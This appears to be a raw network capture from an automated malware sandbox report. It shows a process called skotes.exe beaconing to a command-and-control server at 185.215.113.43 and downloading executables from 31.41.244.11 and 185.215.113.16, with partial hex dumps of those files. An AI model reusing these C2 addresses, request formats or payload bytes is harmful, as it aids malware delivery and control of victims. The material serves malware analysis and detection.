                                                                                                                                                                                              Dec 16, 2024 01:01:41.288705111 CET1236INData Raw: 61 25 a5 ac f8 54 20 99 3d e4 ff 0f cd 4a 00 e2 6b f6 09 29 ad 3a 68 31 0d e5 e5 97 f8 92 04 f6 17 16 ce fb 0b d2 ea 96 b0 e2 33 78 0c d3 67 e5 fe a6 80 77 ca 0a 18 b0 e2 4d 87 2f 04 d6 9b 11 f5 6f cc c6 8c 68 f3 d6 84 03 fe 0c cc 3c 30 8e 3b b1
                                                                                                                                                                                              Data Ascii: a%T =Jk):h13xgwM/oh<0;|_S4|B/*`zon>ZiwH]<nnfwL0y^ZPStVfX]9!&M)Vf>/MdOD2Y4Yb'+J!BgO
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288723946 CET1236INData Raw: 90 f2 18 b0 d0 a7 a2 84 ad 96 1a 98 d0 57 b0 a6 5e 95 9c 90 09 41 95 12 c7 f2 8f c5 23 d8 a1 f1 29 95 ae 90 7e fc 57 e2 d5 e8 02 83 d2 cd 4a c6 52 ee 1e 0c 7a b0 b2 66 c2 70 de 93 af be 3d fa 73 17 f2 6d d5 9c f8 5c 02 fa 3e fb 99 f0 a9 bb d6 e6
                                                                                                                                                                                              Data Ascii: W^A#)~WJRzfp=sm\>jdD^(]je:^t(\G=Q%+G(kGFF]c:(!h^4<Xq;
                                                                                                                                                                                              Dec 16, 2024 01:01:41.408493996 CET1236INData Raw: 8b e7 0a d1 a4 ce dd 16 5f e7 e8 e1 a8 6d dc bf be bc 73 17 ed a3 16 c2 81 e7 8a bb 21 e9 6e 53 c6 91 d5 9f cb df dc b8 21 c9 6e 67 64 6d e1 ba d3 12 fb fd 16 5a c2 be f4 8b 83 94 d0 6e 02 fe 84 42 f9 6c 83 3e 0d 0c 5a 6d 66 0f c5 cd 6a 94 69 b4
                                                                                                                                                                                              Data Ascii: _ms!nS!ngdmZnBl>Zmfjij;w>X#ts'sjaqv[>,'i")+:mRu%(!B$4)#`8$cr;3+f7)73S7


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              11192.168.2.449877185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:01:51.556703091 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 35 38 32 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                              Data Ascii: d1=1015823001&unit=246122658369
                                                                                                                                                                                              Dec 16, 2024 01:01:52.461699009 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:52 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              12192.168.2.44988431.41.244.11808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:01:52.860028982 CET62OUTGET /files/unique1/random.exe HTTP/1.1
                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:54.212629080 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:53 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 4482560
                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 23:14:01 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675f62b9-446600"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 b1 4c 5d 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 e0 4b 00 00 64 71 00 00 32 00 00 00 a0 c3 00 00 10 00 00 00 f0 4b 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 c3 00 00 04 00 00 f2 05 45 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f c0 6e 00 73 00 00 00 00 b0 6e 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 86 c3 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 86 c3 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL]g(Kdq2K@E@ _nsnT n@(@.rsrcnP(@.idata nR(@ 8nT(@puwxqislV(@mgfajjwd@D@.taggant0"DD@
                                                                                                                                                                                              Dec 16, 2024 01:01:54.212692022 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:01:54.212723017 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:01:54.212754011 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:01:54.212807894 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:01:54.212845087 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: vN^UvgkJVFjRGf5]
                                                                                                                                                                                              Dec 16, 2024 01:01:54.212881088 CET1236INData Raw: db 8c 26 d5 f1 e6 03 8a 12 73 fd bb 2f 82 cf 73 50 c7 5e 82 97 88 2c bf ef b6 4a 5a eb 43 1b 94 90 0c 61 84 36 a3 a5 06 c1 64 e0 58 2a 3d cc 59 60 b4 94 85 60 4d c3 56 ab 1b 9c 03 85 9e 7c 7e ff de 4b a0 3f b1 84 25 f9 b6 e6 e3 68 c3 b3 e9 35 d1
                                                                                                                                                                                              Data Ascii: &s/sP^,JZCa6dX*=Y``MV|~K?%h5B?[JO<<bhF{JR,oMf8?)L_74O+!z}g*]gFcYY$!w!^YSG7v{Ub"+/-^Xs&?
                                                                                                                                                                                              Dec 16, 2024 01:01:54.213223934 CET1236INData Raw: 22 2b b2 cb da be 0b f3 29 a7 c4 6f 3a 66 1d 29 82 d7 da 3f ff 84 0e a0 7e 6d 99 64 97 19 44 a9 4c 58 c1 90 ee 77 41 40 52 62 a2 45 d4 40 c2 a6 82 01 81 5f 95 36 6c 95 f5 c3 b6 5b 82 de 1d 23 e7 c0 98 93 74 bc b2 4c 88 0b 67 77 b6 26 6e 02 2a 7d
                                                                                                                                                                                              Data Ascii: "+)o:f)?~mdDLXwA@RbE@_6l[#tLgw&n*}#W]qmkibrg>ee]gB(OA^JS(zo(01'l.ZIJ>x^ww0MD"qzNvsz&K$\C
                                                                                                                                                                                              Dec 16, 2024 01:01:54.213258982 CET896INData Raw: 41 a4 71 f6 b1 36 10 01 f8 8f b8 7d 21 a7 52 e2 cc e8 f8 8b 50 3a f5 94 ee ac 5a c5 6e 9a eb 69 e4 86 7a 93 6d bd 94 65 7f 3f 7b 9e 22 6a 9c a4 f3 61 95 d9 d9 cc 2b 26 6f 7d 11 46 15 ff 87 a6 f9 e6 2b d1 c9 c0 41 42 38 0a ac 7d fa 99 0e e1 19 92
                                                                                                                                                                                              Data Ascii: Aq6}!RP:Znizme?{"ja+&o}F+AB8}S-R6QLtu4l#aZkK?59>24^KkmirLf@a5ZZ=Z_c}4G`%e8Fdxh:4qRKT/{Z^:vUWW[j
                                                                                                                                                                                              Dec 16, 2024 01:01:54.213371992 CET1236INData Raw: 6d bf 4d f4 02 04 7d 71 be b4 7d ce d1 c8 7c 77 7a aa 1e e8 27 1a 5e 48 82 bf 2a 5b d1 82 d8 01 cd 17 6b 96 02 34 7b 7d 89 1a 6c e9 59 b5 d4 84 8a b7 b2 57 6e 09 f6 98 af ab 0c 55 83 96 d7 be ea 33 e1 42 62 2b f3 72 86 73 9f 6c 0a 9c 59 0d f3 83
                                                                                                                                                                                              Data Ascii: mM}q}|wz'^H*[k4{}lYWnU3Bb+rslYRmF?Ax)^Kd,PW.?S{Tivb6.9{F1M\CuPBjnyx!r;wl?:(3J;Bnz0;oLhw*z&\~,cN
                                                                                                                                                                                              Dec 16, 2024 01:01:54.332756996 CET1236INData Raw: 42 5f 1f 33 cf 98 7a d4 41 23 a1 75 0c 61 4b 54 d9 fd 83 db 7c 60 bc 74 8c 5f 90 be 4b b8 9e b6 6c ba 49 6e 02 2a 61 7e 40 01 2b af df 90 56 dd ae 9d 92 0d 30 4e 4f 92 fd 7c c8 b2 21 a8 52 3a 47 37 69 eb 3d a9 87 b2 3b ce aa 77 94 d5 5e 7d cb 12
                                                                                                                                                                                              Data Ascii: B_3zA#uaKT|`t_KlIn*a~@+V0NO|!R:G7i=;w^}5WEuiyQ,L:WXi]\uv:7Ht/cMhOlu4wY*7!j:8j^3RuN}Og|g^u&C]B#Xi1}


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              13192.168.2.449908185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:02:05.406351089 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 35 38 32 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                              Data Ascii: d1=1015824001&unit=246122658369
                                                                                                                                                                                              Dec 16, 2024 01:02:06.614835024 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:06 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              14192.168.2.44991431.41.244.11808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:02:06.755383968 CET61OUTGET /files/encoxx/random.exe HTTP/1.1
                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:02:08.099294901 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:07 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 393728
                                                                                                                                                                                              Last-Modified: Thu, 12 Dec 2024 07:55:00 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675a96d4-60200"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$'FFFFFFFFFFFFRichFPELfebQ@$8gd0:-@.textab `.data`f@.rsrcz0<@@
                                                                                                                                                                                              Dec 16, 2024 01:02:08.099384069 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 6d 05 00 00 00 00 00 88 69 05 00 9c 69 05 00 b4 69 05 00 c8 69 05 00 e2 69 05
                                                                                                                                                                                              Data Ascii: miiiiijj*jDjXjnjjjjjjjjk k6kRkhkpikkkkkkkll(l>lRlblvlll
                                                                                                                                                                                              Dec 16, 2024 01:02:08.099394083 CET1236INData Raw: 6c 05 00 bc 6c 05 00 cc 6c 05 00 e2 6c 05 00 f6 6c 05 00 78 6b 05 00 5c 69 05 00 90 71 05 00 80 6d 05 00 9c 6d 05 00 ba 6d 05 00 cc 6d 05 00 d8 6d 05 00 f0 6d 05 00 08 6e 05 00 1a 6e 05 00 2a 6e 05 00 38 6e 05 00 4a 6e 05 00 62 6e 05 00 76 6e 05
                                                                                                                                                                                              Data Ascii: lllllxk\iqmmmmmmnn*n8nJnbnvnnnnnnnnnoo8oJoXodonoooooooopp&p2p<pHpZpppppppppqq*q<q
                                                                                                                                                                                              Dec 16, 2024 01:02:08.099519968 CET1236INData Raw: 6e 64 69 63 61 74 65 73 20 61 20 62 75 67 20 69 6e 20 79 6f 75 72 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 0d 0a 00 00 52 36 30 33 30 0d 0a 2d 20 43 52 54 20 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 64 0d 0a 00 00 52 36 30 32 38 0d 0a 2d 20 75 6e
                                                                                                                                                                                              Data Ascii: ndicates a bug in your application.R6030- CRT not initializedR6028- unable to initialize heapR6027- not enough space for lowio initializationR6026- not enough space for stdio initializationR6025- pure virtua
                                                                                                                                                                                              Dec 16, 2024 01:02:08.099531889 CET1236INData Raw: 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b
                                                                                                                                                                                              Data Ascii: *+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~=EEE00P('8PW700PP (`h`hhhxppwppGetProcessWindowStationGetUserObjectInformationAGetL
                                                                                                                                                                                              Dec 16, 2024 01:02:08.099543095 CET672INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: h(((( H
                                                                                                                                                                                              Dec 16, 2024 01:02:08.099555969 CET1236INData Raw: 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee
                                                                                                                                                                                              Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
                                                                                                                                                                                              Dec 16, 2024 01:02:08.099948883 CET1236INData Raw: 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00
                                                                                                                                                                                              Data Ascii: '`vector vbase copy constructor iterator'`vector copy constructor iterator'`dynamic atexit destructor for '`dynamic initializer for '`eh vector vbase copy constructor iterator'`eh vector copy constructor iterator'`managed vec
                                                                                                                                                                                              Dec 16, 2024 01:02:08.099961042 CET1236INData Raw: 00 00 00 60 2b 40 00 58 2b 40 00 4c 2b 40 00 40 2b 40 00 34 2b 40 00 28 2b 40 00 1c 2b 40 00 14 2b 40 00 08 2b 40 00 fc 2a 40 00 aa 1a 40 00 40 26 40 00 24 26 40 00 10 26 40 00 f0 25 40 00 d4 25 40 00 f4 2a 40 00 ec 2a 40 00 a8 1a 40 00 e8 2a 40
                                                                                                                                                                                              Data Ascii: `+@X+@L+@@+@4+@(+@+@+@+@*@@@&@$&@&@%@%@*@*@@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@|*@x*@t*@p*@l*@h*@d*@`*@\*@X*@T*@P*@L*@@*@4*@,*@
                                                                                                                                                                                              Dec 16, 2024 01:02:08.100117922 CET672INData Raw: 8b ec b8 f8 15 00 00 e8 c3 ce 00 00 8b 45 08 8b 08 8b 50 04 a1 18 94 45 00 53 56 89 4d f4 8b 0d 1c 94 45 00 89 45 d4 57 8d 45 ec 89 55 e8 c7 45 ec 00 00 00 00 89 4d e0 e8 b2 ff ff ff 81 45 ec 3f 02 00 00 83 3d ec 0b 46 00 14 75 11 6a 00 6a 00 8d
                                                                                                                                                                                              Data Ascii: EPESVMEEWEUEME?=FujjRL@ E$E=4@@EME EEuFu=uF@.=ujj@xFUEEEUU3=FF
                                                                                                                                                                                              Dec 16, 2024 01:02:08.219367981 CET1236INData Raw: 00 6a 00 ff 15 98 10 40 00 56 e8 50 fd ff ff 83 c6 08 83 6d fc 01 75 b1 5f 5e 5b 8b e5 5d c3 51 68 70 ea 45 00 e8 15 15 00 00 83 c4 08 c3 cc 55 8b ec 64 a1 00 00 00 00 6a ff 68 28 61 45 00 50 b8 34 10 00 00 64 89 25 00 00 00 00 e8 de cb 00 00 53
                                                                                                                                                                                              Data Ascii: j@VPmu_^[]QhpEUdjh(aEP4d%SVW=t@33l@SN~F?|=FSPSX@SSS8@SSSMQSSS@3E]fUSS](SSSSSSQ


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              15192.168.2.449927185.215.113.43808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:02:11.550601006 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 35 38 32 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                              Data Ascii: d1=1015825001&unit=246122658369
                                                                                                                                                                                              Dec 16, 2024 01:02:12.912950993 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:12 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              16192.168.2.449933185.215.113.16808188C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Dec 16, 2024 01:02:13.397119999 CET55OUTGET /luma/random.exe HTTP/1.1
                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                              Dec 16, 2024 01:02:14.569161892 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:02:13 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 1846272
                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 23:57:25 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "675f6ce5-1c2c00"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 b0 00 00 00 00 00 00 00 00 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 49 00 00 04 00 00 83 b5 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gI@0I@T0h 1 H@.rsrc X@.idata 0\@ *@^@yoxsliso@/`@cztlhsvnH@.taggant0I"@
                                                                                                                                                                                              Dec 16, 2024 01:02:14.569269896 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:14.569286108 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:14.569487095 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Dec 16, 2024 01:02:14.569557905 CET1236INData Raw: ed 27 3f 84 58 02 ba 2e 3e 30 98 4e 5e 50 4a 57 83 c0 c3 5b e0 a7 be e3 a0 83 15 b4 c0 bd d4 f6 f4 f7 44 e6 5a 3b bc 11 b0 87 d5 58 28 0f 9e e0 56 40 bd 91 c8 0a d4 ec 67 70 9b 12 9f 58 9e f7 29 31 cf 01 b4 c5 e9 21 73 b6 5c 1a ab 1e e6 da 9d 2b
                                                                                                                                                                                              Data Ascii: '?X.>0N^PJW[DZ;X(V@gpX)1!s\+2VZf)eg[r4':;vU\'fL_gR~vr@A0gS`7'E,Y~*9M%Y<j+EIA{GJz<wNF+07*wN#LR
                                                                                                                                                                                              Dec 16, 2024 01:02:14.569575071 CET1236INData Raw: 30 6d 7b 0e 6f 5d df 82 e0 3e d7 8c 7a 95 03 ba 93 5f bb ee 0c 23 fa 2b b3 5d 1b 5b 1c 0b da e2 e8 99 80 e5 72 33 08 6b 4c df 9b 4e bf c8 bc 50 c3 5f 9a 21 a7 a3 a1 35 02 6f 47 79 05 15 11 11 9f 87 74 1c d2 49 45 6c 9f 13 a3 12 69 37 9a d6 90 cf
                                                                                                                                                                                              Data Ascii: 0m{o]>z_#+][r3kLNP_!5oGytIEli777)\b[c.'T$1I^y}-9`Bc4.M?0RGOo?!C'C%gXOB?&(V#1`W3=C`irEOV#!
